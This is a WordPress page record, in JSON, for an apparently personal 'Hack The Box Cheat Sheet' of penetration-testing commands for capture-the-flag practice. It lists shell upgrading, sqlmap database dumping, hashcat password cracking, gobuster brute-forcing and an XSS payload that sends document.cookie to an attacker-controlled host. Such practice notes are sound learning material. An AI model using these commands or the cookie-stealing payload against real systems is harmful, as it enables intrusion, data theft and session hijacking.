{"id":214,"date":"2024-08-13T00:12:25","date_gmt":"2024-08-12T23:12:25","guid":{"rendered":"https:\/\/unchaincode.com\/?page_id=214"},"modified":"2024-08-13T17:37:03","modified_gmt":"2024-08-13T16:37:03","slug":"hack-the-box-cheat-sheet","status":"publish","type":"page","link":"https:\/\/unchaincode.com\/index.php\/hack-the-box-cheat-sheet\/","title":{"rendered":"Hack The Box Cheat Sheet"},"content":{"rendered":"\n

Upgrade Shell<\/strong><\/p>\n\n\n\n

python -c 'import pty;pty.spawn(\"\/bin\/bash\")'
Background Session with ctrl + z
stty raw -echo && fg
press enter 2x
export TERM=xterm<\/pre>\n\n\n\n
SQLMap<\/strong><\/p>\n\n\n\n
sqlmap -r [Request] --level[0-5] --risk[0-3] --batch --dbms=mysql --dbs
sqlmap -r [Request] --batch --dbms=mysql -D [database] --tables --thread 10
sqlmap -r [Request] --dbms=mysql -D [database] -T [tables] -C [column] --dump    <\/pre>\n\n\n\n
SSH Private Key<\/strong><\/p>\n\n\n\n
chmod 600 [KEY]

ssh -i [KEY] user@[IP]<\/pre>\n\n\n\n
Hashcat<\/strong><\/p>\n\n\n\n
hashid [hash.txt] 

hashcat -m 1400 [hash.txt] \/usr\/share\/wordlists\/rockyou.txt<\/pre>\n\n\n\n
Gobuster<\/strong><\/p>\n\n\n\n
gobuster dir -u [website] -w \/usr\/share\/wordlists\/dirbuster\/[commontext]

gobuster vhost -u [website] -w \/usr\/share\/wordlists\/seclists\/Discovery\/DNS\/[subdomain]<\/pre>\n\n\n\n
Java script payload<\/strong><\/p>\n\n\n\n
<img src=x onerror=fetch(\"http:\/\/[localIP]:port\/\"+document.cookie);><\/pre>\n","protected":false},"excerpt":{"rendered":"
Upgrade Shell python -c ‘import pty;pty.spawn(“\/bin\/bash”)’Background Session with ctrl + zstty raw -echo && fgpress enter 2xexport TERM=xterm SQLMap sqlmap -r [Request] –level[0-5] –risk[0-3] –batchContinue readingHack The Box Cheat Sheet<\/span><\/a><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-214","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/unchaincode.com\/index.php\/wp-json\/wp\/v2\/pages\/214","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/unchaincode.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/unchaincode.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/unchaincode.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/unchaincode.com\/index.php\/wp-json\/wp\/v2\/comments?post=214"}],"version-history":[{"count":6,"href":"https:\/\/unchaincode.com\/index.php\/wp-json\/wp\/v2\/pages\/214\/revisions"}],"predecessor-version":[{"id":236,"href":"https:\/\/unchaincode.com\/index.php\/wp-json\/wp\/v2\/pages\/214\/revisions\/236"}],"wp:attachment":[{"href":"https:\/\/unchaincode.com\/index.php\/wp-json\/wp\/v2\/media?parent=214"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}